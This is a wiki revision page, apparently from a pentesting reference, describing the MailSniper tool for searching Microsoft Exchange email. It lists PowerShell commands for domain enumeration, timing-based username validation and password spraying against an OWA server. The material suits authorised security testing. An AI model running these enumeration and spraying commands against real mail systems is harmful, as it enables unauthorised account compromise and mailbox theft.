| Line 1: | Line 1: | ||
[[Category:Tools]] | [[Category:Tools]] | ||
==Description<ref>https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/</ref>== | ==Description<ref>https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/</ref>== | ||
MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email or by an Exchange administrator to search the mailboxes of every user in a domain. | |||
==Commands<ref>https://github.com/dafthack/MailSniper</ref>== | ==Commands<ref>https://github.com/dafthack/MailSniper</ref>== | ||
Revision as of 12:29, 22 February 2023
Description[1]
MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email or by an Exchange administrator to search the mailboxes of every user in a domain.
Commands[2]
# Enumerate Netbios name
Invoke-DomainHarvestOWA -ExchHostname mail.name.com
# Uses timing attack to validate possible usernames with OWA server
Invoke-UsernameHarvestOWA -ExchHostname mail.name.io -Domain name.io -UserList possible.txt -OutFile valid.txt
# Password spray valid usernames with specific password
Invoke-PasswordSprayOWA -ExchHostname mail.name.io -UserList valid.txt -Password P@assword1234